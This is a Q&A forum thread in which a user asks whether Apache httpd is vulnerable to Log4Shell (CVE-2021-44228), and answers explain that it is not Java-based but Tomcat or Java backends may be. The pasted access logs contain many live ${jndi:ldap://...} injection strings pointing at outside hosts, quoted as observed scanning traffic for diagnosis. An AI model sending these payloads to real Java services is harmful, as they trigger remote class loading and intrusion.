Does Apache Webserver use log4j (CVE-2021-44228)?

apache2

Does the apache webserver (apache2) use log4j?

I have Apache2 2.4.38 (debian) installed on Raspberry Pi OS (64bit) and found some strange records in my log regarding CVE-2021-44228 from kryptoslogic-cve-2021-44228.com (honeypot/scanner), dataastatistics.com (offline & malicious?) and a8fvkc.dnslog.cn (I dont know what this is)

What should I do now?

  • nothing because apache2 is not affected by CVE-2021-44228
  • format everything and wait for a few days before I install a patched version
  • "check" if there are any new .class files and if there are not continue operation (and use manual patches like log4j2.formatMsgNoLookups = TRUE
  • something else

Logs:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"

The Apache HTTP Server is not written in Java, it does not use the log4j library, so it is not affected by CVE-2021-44228.

Your log files are from the access log, they show people scanning for the log4j vulnerability.


Apache itself is not written in Java and does not directly link the infamous Log4j library. It is particularilly safe from this vulnerability.

What else can go wrong, then?

  1. Not everything with Apache in its name and HTTP functions is exactly the Apache HTTPD server. Apache Tomcat, for example, is completely different HTTP web server. It is written in Java and can pretty much be configured to use Log4J. I am not really sure if it is at all possible to log otherwise in Tomcat.

Someone with less experience and knowledge is perfectly capable of mistaking those two. And, to my knowledge, Tomcat has in general better security track record than the "classical" Apache HTTPD.

(As per Bob's comment, the default logging facility in Tomcat is not Log4J.)

  1. Apache HTTPD is very much extensible. It can be configured to call other things in the background by variety of interfaces (e.g. in order to fetch dynamic web pages that are generated programatically). Some of these "things in the background" may be java-based and linked to the Log4J library.

Your mileage may vary, especially if you don't know in detail your software stack.

In order to be sure, you should first check if you have any Java machine installed. In your package manager, it's packages will be called JRE-something, JVM-something or maybe JAVA-something.

You may as well try:

java -version

in your shell.

If you don't have any of these and you didn't install JAVA outside of your package manager, you are safe.

Not safe in general, but at least safe against CVE-2021-44228.

Related

SSH connection lost during server upgrade - How to reconnect to process?
How can I tell which config file Apache is using?
How to find memory usage of individual Windows services?
What is a T1 in modern terms?
How do I list all users with root?
What is a good solution to encrypt some files in unix? [closed]
Where did "Wait 30 seconds before turning it back on" come from?
How to update cURL CA bundle on RedHat?
Rogue DHCP Server Can't be found
How can I find the biggest directories in unix / Ubuntu?
PostgreSQL Replication
.nfsXXXX files appearing, what are those?